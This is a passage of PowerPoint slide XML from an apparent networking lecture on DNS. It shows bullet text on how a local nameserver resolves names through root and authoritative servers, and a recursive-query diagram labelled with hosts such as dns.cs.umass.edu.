          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Client queries local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> queries root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> for authoritative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameservers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> for some domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> queries authoritative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>nameserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Returns result to client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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77</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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990600" y="0"/>
            <a:ext cx="7467600" cy="1143000"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DNS Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1814513"/>
            <a:ext cx="2971800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Recursive query example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 65"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2740025" y="1103313"/>
            <a:ext cx="5337176" cy="5526087"/>
            <a:chOff x="1516" y="384"/>
            <a:chExt cx="3362" cy="3481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="1026" name="Object 2"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2040" y="2792"/>
            <a:ext cx="525" cy="402"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s157714" name="Clip" r:id="rId4" imgW="1307263" imgH="1084139" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="1307263" imgH="1084139"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0" y="2792"/>
                          <a:ext cx="525" cy="4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1" name="Text Box 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1516" y="3156"/>
              <a:ext cx="1001" cy="233"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>requesting host</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2981" y="3653"/>
              <a:ext cx="1425" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>gaia.cs.umass.edu</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="1027" name="Object 3"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3378" y="3296"/>
            <a:ext cx="525" cy="402"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s157715" name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="1307263" imgH="1084139" progId="">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8" y="3296"/>
                          <a:ext cx="525" cy="4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9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2196" y="1488"/>
              <a:ext cx="233" cy="415"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1083" name="AutoShape 7"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1084" name="Rectangle 8"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1085" name="Rectangle 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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1086" name="AutoShape 1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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1087" name="Line 11"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1088" name="Line 12"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1089" name="Rectangle 1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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1090" name="Rectangle 14"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1034" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2545" y="384"/>
              <a:ext cx="1642" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>root DNS server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2227" y="1918"/>
              <a:ext cx="0" cy="828"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1036" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2299" y="850"/>
              <a:ext cx="576" cy="612"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2347" y="1936"/>
              <a:ext cx="6" cy="834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1082" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2354" y="1845"/>
              <a:ext cx="1049" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>local DNS server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ns.iut.ac.ir</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1039" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2045" y="2457"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1040" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2387" y="987"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1041" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="2112"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1042" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3312" y="2160"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1043" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="1296"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Group 27"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2898" y="594"/>
              <a:ext cx="233" cy="415"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1073" name="AutoShape 28"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1074" name="Rectangle 29"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1075" name="Rectangle 30"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1076" name="AutoShape 31"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1077" name="Line 32"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1078" name="Line 33"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1079" name="Rectangle 34"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1080" name="Rectangle 35"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3420" y="1494"/>
              <a:ext cx="233" cy="415"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1065" name="AutoShape 37"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1066" name="Rectangle 38"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1067" name="Rectangle 3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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068" name="AutoShape 4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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069" name="Line 41"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1070" name="Line 42"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1071" name="Rectangle 4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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1072" name="Rectangle 44"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 45"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3408" y="2514"/>
              <a:ext cx="233" cy="415"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1057" name="AutoShape 46"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1058" name="Rectangle 47"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1059" name="Rectangle 4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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1060" name="AutoShape 4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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1061" name="Line 50"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1062" name="Line 51"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1063" name="Rectangle 5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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1064" name="Rectangle 53"/>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fa-IR"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1047" name="Text Box 54"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2830" y="2871"/>
              <a:ext cx="1649" cy="366"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>authoritative DNS server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns.cs.umass.edu</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1048" name="Text Box 55"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2592" y="1344"/>
              <a:ext cx="196" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
